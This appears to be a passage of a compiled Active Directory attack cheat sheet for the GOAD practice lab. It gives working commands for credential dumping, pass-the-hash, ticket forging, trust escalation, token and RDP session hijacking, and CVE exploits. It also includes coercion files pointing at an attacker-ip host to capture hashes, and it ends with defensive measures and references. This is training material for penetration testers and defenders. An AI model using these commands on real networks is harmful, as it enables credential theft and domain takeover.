- Machine account credentials
- Service account passwords
- Tools: secretsdump.py, mimikatz
Method: Extract credentials from memory
-
Tools: lsassy, Dumpert, procdump, mimikatz
-
Retrieved Data:
- Domain NTLM hashes
- Kerberos tickets (TGT/TGS)
- Plaintext passwords (if WDigest enabled)
-
Exploitation:
lsassy -u user -p password -d domain target-ip
Method: Authenticate using NT hash without password
-
Tools: crackmapexec, impacket, evil-winrm
-
Exploitation:
cme smb target-range -u administrator -H ntlm-hash wmiexec.py -hashes :ntlm-hash administrator@target
Methods:
- psexec.py: Service-based execution (most detectable)
- wmiexec.py: WMI process creation (stealthier)
- smbexec.py: Service creation per request (no executable upload)
- atexec.py: Scheduled task exploitation
- dcomexec.py: DCOM abuse
Method: PowerShell remoting over HTTP/HTTPS
-
Port: 5985 (HTTP), 5986 (HTTPS)
-
Requirements: Valid credentials or hash
-
Exploitation:
evil-winrm -i target -u user -p password evil-winrm -i target -u user -H ntlm-hash
Method: RDP without sending credentials to target
-
Requirements: Restricted Admin mode enabled
-
Tools: xfreerdp
-
Exploitation:
xfreerdp /u:administrator /pth:ntlm-hash /v:target /restricted-admin
Method: Convert NT hash to Kerberos TGT
-
Tools: Rubeus, getTGT.py
-
Exploitation:
getTGT.py domain/user -hashes :ntlm-hash export KRB5CCNAME=user.ccache
Method: Use extracted Kerberos tickets
-
Source: LSASS memory dumps, Rubeus extraction
-
Tools: Rubeus, ticketConverter.py
-
Exploitation:
export KRB5CCNAME=ticket.ccache smbclient.py -k dc.domain.local
Method: Use compromised certificates for authentication
-
Tools: certipy
-
Exploitation:
certipy auth -pfx user.pfx -dc-ip 192.168.56.11
Vulnerability: Child domain compromise allows parent domain escalation
-
Attack Chain:
- Extract child domain krbtgt hash (DCSync)
- Obtain child and parent domain SIDs
- Forge golden ticket with parent's Enterprise Admins SID (SID-519)
- Authenticate to parent domain as Enterprise Admin
-
Tools: ticketer.py, mimikatz
-
Exploitation:
# Get krbtgt hash and SIDs secretsdump.py domain/user:password@dc # Forge ticket ticketer.py -nthash krbtgt-hash -domain child.domain.local -domain-sid S-1-5-21-CHILD-SID -extra-sid S-1-5-21-PARENT-SID-519 -user-id 500 administrator # Use ticket export KRB5CCNAME=administrator.ccache secretsdump.py -k parent-dc.domain.local -just-dc
Vulnerability: Trust keys enable cross-domain authentication
- Attack Chain:
- Extract trust key (target domain's NetBIOS name in NTDS)
- Forge inter-realm TGT with SPN
krbtgt/parent_domain - Request TGS in parent domain
- Advantage: Works even if krbtgt password changed twice
- Tools: ticketer.py, mimikatz
Vulnerability: Automated child-to-parent escalation
-
Tool: raiseChild.py (Impacket)
-
Exploitation:
raiseChild.py child.domain.local/admin:password
-
Impact: Single command creates golden ticket for enterprise admin
Vulnerability: DCs have unconstrained delegation by default
- Attack Chain:
- Compromise unconstrained delegation account in child domain
- Coerce parent DC authentication (PetitPotam)
- Extract parent DC TGT
- DCSync parent domain
- Impact: Parent domain compromise
Vulnerability: Identical usernames with same passwords in different forests
- Method: Dump NTDS from one forest, test against other forests
- Common: Frequently exploitable in production environments
Vulnerability: Cross-forest group memberships (Foreign Security Principals)
- Discovery: Enumerate foreign users/groups in trusted forests
- Attack Vectors:
- Shadow credentials
- Password changes
- Kerberoasting
- Tools: BloodHound, PowerView
Vulnerability: SID history enabled on forest trusts
- Attack: Forge golden tickets with external forest group memberships
- Exploitation: "Can spoof any RID >1000 group if SID history is enabled"
- Impact: ACL exploitation across domain boundaries
Vulnerability: Database trust relationships span forest boundaries
- Attack: Use linked servers to execute commands across forests
- Impact: Cross-forest pivoting and command execution
Vulnerability: Windows resolves UNC paths in .lnk files when viewed
-
Tool: crackmapexec slinky module
-
Exploitation:
cme smb target -u user -p password -M slinky -o SERVER=attacker-ip NAME=document
-
Impact: NetNTLM hash capture via Responder
Vulnerability: Shell command files trigger authentication
- Tool: crackmapexec scuffy module
- Similar to: .lnk files but using different file format
Vulnerability: Internet shortcut files with UNC paths
- Method: Create .url file pointing to attacker-controlled UNC path
- Trigger: User browses share containing malicious .url file
- Impact: Authentication callback for hash capture
Vulnerability: WebClient service can be triggered to start, enabling HTTP-based authentication
-
Method: Upload
.searchConnector-msfiles to accessible shares -
searchConnector-ms File Structure:
<?xml version="1.0" encoding="UTF-8"?> <searchConnectorDescription> <iconReference>\\attacker-ip@80\webdav\icon.ico</iconReference> <description>Search</description> <isSearchOnlyItem>false</isSearchOnlyItem> <includeInStartMenuScope>true</includeInStartMenuScope> <templateInfo> <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType> </templateInfo> <simpleLocation> <url>\\attacker-ip@80\webdav</url> </simpleLocation> </searchConnectorDescription>
-
Attack Chain:
- Drop
.searchConnector-msfile on accessible share - When user browses the share, WebClient service starts
- HTTP-based authentication triggered (bypasses SMB signing requirements)
- Relay to LDAPS for shadow credentials or RBCD attacks
- Drop
-
Requirements:
- WebClient service installed (workstations, not servers by default)
- User must browse the share containing the malicious file
-
LDAP Relay (if signing not enforced):
- Add shadow credentials → PKINIT authentication
- Configure RBCD → impersonate admin
-
Impact: HTTP-to-LDAP relay enables domain compromise on workstations
Vulnerability: Available tokens on compromised systems can be stolen
-
Method: Use stolen tokens to execute commands as other users without credentials
-
Token Types:
- Delegation tokens: Created for interactive logins (RDP, console)
- Impersonation tokens: Created for non-interactive sessions
-
Tools: incognito (Meterpreter), Invoke-TokenManipulation, TokenDuplicator
-
Exploitation Flow:
# List available tokens Invoke-TokenManipulation -Enumerate # Impersonate specific user token Invoke-TokenManipulation -ImpersonateUser -Username "DOMAIN\admin" # Execute command with impersonated token Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "DOMAIN\admin"
-
Requirements: Requires SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
-
Impact: Execute commands as other logged-in users without their credentials
Vulnerability: Administrator can redirect active RDP sessions (Server 2016)
-
Method: Use
tscon.exeto redirect active sessions to attacker's session -
Requirements:
- SYSTEM privileges (use
Psexec64.exe -s cmd.exeto elevate) - Active RDP session exists
- Vulnerable OS version (primarily Server 2016)
- SYSTEM privileges (use
-
Exploitation:
# Enumerate active sessions query user # Example output: # USERNAME SESSIONNAME ID STATE # administrator rdp-tcp#1 2 Active # victim_user rdp-tcp#0 1 Active # Hijack victim's session (run from SYSTEM context) tscon.exe 1 /dest:rdp-tcp#1
-
Impact: Take over another user's active desktop session without credentials
Vulnerability: Computer account manipulation for privilege escalation
- Attack Chain:
- Add computer account (MAQ=10 by default)
- Clear computer account SPNs
- Rename to match domain controller (without $)
- Obtain TGT
- Restore original name
- Request service tickets via S4U2self
- Perform DCSync
- Tools: noPac (Windows/cube0x0), noPac.py (Linux/Impacket)
- Patched: Late 2021
- Impact: Domain admin privileges
Vulnerability: Print Spooler service allows arbitrary DLL injection
- Affected Systems: Windows Server 2016, 2019 (unpatched)
- Requirements:
- Active Print Spooler service
- Domain user credentials
- SMB share for DLL delivery
- Exploitation:
- Create malicious DLL payload
- Host on SMB share
- Trigger PrintNightmare exploit
- Gain SYSTEM privileges
- Tools: CVE-2021-1675.py, cube0x0 PoC
- Patched: 2021 (but exploitation still possible if unpatched)
- Cleanup: Driver files in spool directories
Vulnerability: Computer account DNS hostname spoofing for certificate abuse
- Attack Chain:
- Create computer account
- Set dNSHostName to match DC
- Request computer certificate
- Certificate issued with DC identity
- Authenticate as DC
- Tools: Certipy
- Patched: May 2022
- Impact: Domain controller impersonation, full domain compromise
Vulnerability: Certificate request agent application policy abuse
- Attack: Request certificates on behalf of privileged users
- Patched: November 12, 2024
- Impact: Privilege escalation via certificate delegation
Vulnerability: NTLM MIC removal bypass
- Attack: Relay attacks bypass signing requirements
- Exploitation: Used in combination with PrinterBug/PetitPotam
- Impact: NTLM relay to LDAPS for domain compromise
Vulnerability: Netlogon cryptography bypass
- Impact: Instant escalation to Domain Admin without credentials
- Status: Mentioned as motivation for GOAD creation
- Note: In hardened GOAD setups, all hosts patched to latest version, making CVE exploitation impossible
- Tools: SecuraBV/CVE-2020-1472
- BloodHound / SharpHound - AD relationship mapping
- crackmapexec (cme) - Multi-protocol enumeration
- enum4linux - SMB/RPC enumeration
- rpcclient - Direct RPC queries
- Nmap - Network scanning, service detection
- adidnsdump - DNS record enumeration
- PowerView - PowerShell AD enumeration
- Responder - LLMNR/NBT-NS poisoning
- mitm6 - DHCPv6 poisoning
- hashcat - Offline hash cracking
- john - Password cracking
- sprayhound - Password spraying
- Rubeus - Kerberos attacks (Windows)
- Impacket suite - Python-based AD attacks
- GetNPUsers.py - AS-REP roasting
- GetUserSPNs.py - Kerberoasting
- getTGT.py / getST.py - Ticket operations
- secretsdump.py - Credential dumping
- psexec.py / wmiexec.py / smbexec.py - Remote execution
- addcomputer.py - Machine account creation
- rbcd.py - RBCD configuration
- raiseChild.py - Child-to-parent escalation
- ticketer.py - Golden/Silver ticket creation
- Certipy - ADCS enumeration and exploitation
- Certify - Certificate template enumeration
- Coercer - Authentication coercion
- Pywhisker / Whisker - Shadow credentials
- PetitPotam - Coercion technique
- evil-winrm - PowerShell remoting
- lsassy - LSASS credential extraction
- mimikatz - Credential extraction
- procdump - Process dumping
- mssqlclient.py - MSSQL client (Impacket)
- PowerUpSQL - PowerShell MSSQL exploitation
- PrintSpoofer / SweetPotato / BadPotato - Token impersonation
- KrbRelayUp - Kerberos relay
- WinPEAS - Privilege escalation enumeration
- bloodyAD - ACL exploitation
- dacledit.py - DACL modification
- SharpGPOAbuse - GPO abuse
- ntlmrelayx - NTLM relay attacks
- burp suite - Web application testing
| Misconfiguration | Impact | Exploitation |
|---|---|---|
| NULL sessions enabled | Anonymous enumeration | User/group discovery, share access |
| SMB signing disabled | NTLM relay attacks | Admin access to unsigned hosts |
| Weak password policy | Password attacks | Spraying, brute force |
| Passwords in descriptions | Immediate compromise | Authenticated access |
| PreAuth disabled accounts | AS-REP roasting | Offline hash cracking |
| Service accounts with SPNs | Kerberoasting | Offline TGS cracking |
| MAQ = 10 | Computer creation | RBCD, DNS spoofing, noPac |
| LDAP signing not enforced | Kerberos/NTLM relay | RBCD, account creation |
| Unconstrained delegation | TGT theft | DC compromise via coercion |
| Constrained delegation | Service impersonation | Privilege escalation |
| GenericWrite on users/computers | Multiple attack paths | Shadow credentials, RBCD, SPNs |
| WriteDacl permissions | ACL manipulation | Privilege escalation chains |
| Writable GPOs | Code execution | SYSTEM on GPO scope computers |
| ADCS misconfigurations | Certificate abuse | ESC1-15 attacks, domain compromise |
| Trustworthy databases | SQL impersonation | Database → instance escalation |
| SeImpersonate privilege | Token abuse | SYSTEM privileges |
| Forest trusts with SID history | Cross-forest compromise | Golden tickets with foreign SIDs |
| Password reuse | Credential stuffing | Multi-domain/forest access |
| WebClient service | HTTP coercion | LDAP relay attacks |
| Print Spooler enabled | Coercion + relay/CVE | DC authentication capture, RCE |
Based on the vulnerabilities in GOAD, here are key defensive measures:
- Disable SMB signing optional - Enforce SMB signing on all systems
- Enforce LDAP signing and channel binding - Prevent relay attacks
- Implement strong password policy - Complexity requirements, longer passwords
- Set MAQ to 0 - Prevent domain users from creating computer accounts
- Remove passwords from user descriptions - Use secure password storage
- Enable PreAuth for all users - Prevent AS-REP roasting
- Minimize service accounts with SPNs - Use gMSA for service accounts
- Regularly audit ACLs - Remove excessive permissions
- Constrain delegation carefully - Only to necessary services
- Harden ADCS - Review certificate templates, enable EPA on web enrollment
- Disable Print Spooler - On systems that don't need printing
- Implement privileged access workstations (PAW) - For admin activities
- Enable Credential Guard - Protect credentials in memory
- Monitor for anomalies - Kerberoasting, DCSync, Golden Tickets
- Patch regularly - Eliminate CVE exploitation vectors
- GitHub Repository: https://github.com/Orange-Cyberdefense/GOAD
- Official Documentation: https://orange-cyberdefense.github.io/GOAD/
- Creator's Blog (Mayfly): https://mayfly277.github.io/
- Part 1 - Reconnaissance and scan: https://mayfly277.github.io/posts/GOADv2-pwning_part1/
- Part 2 - Find users: https://mayfly277.github.io/posts/GOADv2-pwning-part2/
- Part 3 - Enumeration with user: https://mayfly277.github.io/posts/GOADv2-pwning-part3/
- Part 4 - Poison and relay: https://mayfly277.github.io/posts/GOADv2-pwning-part4/
- Part 5 - Exploit with user: https://mayfly277.github.io/posts/GOADv2-pwning-part5/
- Part 6 - ADCS: https://mayfly277.github.io/posts/GOADv2-pwning-part6/
- Part 7 - MSSQL: https://mayfly277.github.io/posts/GOADv2-pwning-part7/
- Part 8 - Privilege escalation: https://mayfly277.github.io/posts/GOADv2-pwning-part8/
- Part 9 - Lateral move: https://mayfly277.github.io/posts/GOADv2-pwning-part9/
- Part 10 - Delegations: https://mayfly277.github.io/posts/GOADv2-pwning-part10/
- Part 11 - ACL: https://mayfly277.github.io/posts/GOADv2-pwning-part11/
- Part 12 - Trusts: https://mayfly277.github.io/posts/GOADv2-pwning-part12/
- Part 13 - Having fun inside a domain: https://mayfly277.github.io/posts/GOADv2-pwning-part13/
- Part 14 - ADCS (ESC 5/7/9/10/11/13/14/15): https://mayfly277.github.io/posts/ADCS-part14/
- HackMD Walkthrough: https://hackmd.io/@jjavierolmedo/goad_writeup
- CyberForge Blog: https://cyberforge.blog/writeups/GOAD/
- E-nzym3 Blog: https://enzym3.io/posts/goad_walkthrough/
- Dcodezero: https://dcodezero.github.io/goad/GOAD-p1/
- GOAD-Light: Lighter version without Essos domain for lower-spec systems
- SCCM Lab: Additional lab for SCCM attacks by Mayfly
Compiled from Mayfly277's official writeups (Parts 1-14) and community contributions.
- Part 1: Reconnaissance and scanning
- Part 2: User discovery (ASREPRoast, password spraying)
- Part 3: Authenticated enumeration (BloodHound, Kerberoasting)
- Part 4: Poisoning and relay (Responder, NTLM relay, MITM6)
- Part 5: CVE exploitation (noPac, PrintNightmare)
- Part 6: ADCS attacks (ESC1-8, Certifried, Shadow Credentials)
- Part 7: MSSQL exploitation (impersonation, linked servers)
- Part 8: Privilege escalation (SeImpersonate, KrbRelayUp, AMSI bypass, in-memory execution)
- Part 9: Lateral movement (PTH, PTT, credential extraction)
- Part 10: Delegation attacks (unconstrained, constrained, RBCD)
- Part 11: ACL abuse (ForceChangePassword, GenericWrite, GPO abuse)
- Part 12: Trust exploitation (child-to-parent, forest trusts, golden ticket + ExtraSid)
- Part 13: Post-exploitation (token impersonation, RDP hijacking, file coercion)
- Part 14: Advanced ADCS (ESC5/7/9/10/11/13/14/15)